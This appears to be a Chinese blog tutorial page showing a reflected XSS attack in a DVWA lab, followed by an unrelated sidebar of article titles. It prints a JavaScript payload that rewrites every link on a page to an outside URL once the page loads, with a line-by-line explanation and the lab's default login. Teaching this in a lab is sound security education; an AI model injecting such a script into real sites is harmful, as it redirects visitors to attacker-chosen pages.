当前位置:网站首页>XX攻击——反射型 XSS 攻击劫持用户浏览器
XX攻击——反射型 XSS 攻击劫持用户浏览器
2022-07-01 08:06:00 【Cwillchris】
我们先构建一个反射型的 XSS 攻击跳转到存在漏洞的页面。其实也可以在 DVWA 中直接进行攻击,但是我们处于演示目的构造了一个相对复杂的环境。
<script>
window.onload = function() {
var link=document.getElementsByTagName("a");
for(j = 0; j < link.length; j++) {
link[j].href="http://www.baidu.com";}
}
</script>
JavaScript 代码分析 window.onload 当网页加载完成时,执行 function 匿名函数
函数功能:document.getElementsByTagName 获取页面中所有的 a 标签,存放到 link 数组中,使用 for 循环将 link 数组中的所有元素替换为恶意网址。
打开 chrome 浏览器,我们在反射型 XSS 中进行测试效果
登录 http://192.168.98.66/DVWA-master/login.php 用户名: admin 密码:password ,改为low级别
边栏推荐
- LSTM of RNN
- Gdip - hatchbrush pattern table
- 【无标题】
- 力扣——求一组字符中的第一个回文字符
- Analysis of slice capacity expansion mechanism
- base64
- 程序员养生宝典
- Uni hot update
- 【批处理DOS-CMD-汇总】扩展变量-延迟变量cmd /v:on、cmd /v:off、setlocal enabledelayedexpansion、DisableDelayedExpansion
- What information does the supplier need to know about Audi EDI project?
猜你喜欢
源代码加密的意义和措施
OJ输入输出练习
Instead of houses, another kind of capital in China is rising
PostgreSQL source code learning (26) -- windows vscode remote debugging PostgreSQL on Linux
【入门】取近似值
![[website architecture] solve 90% of distributed transactions in one move, and introduce the working principles and application scenarios of database transactions and distributed transactions](/img/2c/07d729d49b1d74553decac4588074e.png)
[website architecture] solve 90% of distributed transactions in one move, and introduce the working principles and application scenarios of database transactions and distributed transactions
【刷题】字符统计【0】
凸印的印刷原理及工艺介绍
Learn reptiles for a month and earn 6000 a month? Tell you the truth about the reptile, netizen: I wish I had known it earlier
![[staff] high and low octave mark (the notes in the high octave mark | mark range are increased by one octave as a whole | low octave mark | mark range are decreased by one octave as a whole)](/img/ff/ebd936eaa6e57b1eabb691b0642957.jpg)
[staff] high and low octave mark (the notes in the high octave mark | mark range are increased by one octave as a whole | low octave mark | mark range are decreased by one octave as a whole)
随机推荐
Sorting out tcp/udp communication problems
PostgreSQL source code learning (26) -- windows vscode remote debugging PostgreSQL on Linux
使用threejs简单Web3D效果
getInputStream() has already been called for this request
力扣——求一组字符中的第一个回文字符
web254
Connect timed out of database connection
038 network security JS
uni 热更新
量化交易之读书篇 - 《征服市场的人》读书笔记
LSTM of RNN
【mysql学习笔记27】存储过程
Gru of RNN
How to troubleshoot SharePoint online map network drive failure?
[force deduction 10 days SQL introduction] Day9 control flow
Aardio - 阴影渐变文字
EDA open source simulation tool verilator beginner 6: debugging examples
SharePoint - modify web application authentication using PowerShell
Sqlalchemy creating MySQL_ Table
Rk3399 platform development series explanation (network debugging) 7.30. What will affect the sending process of TCP packets?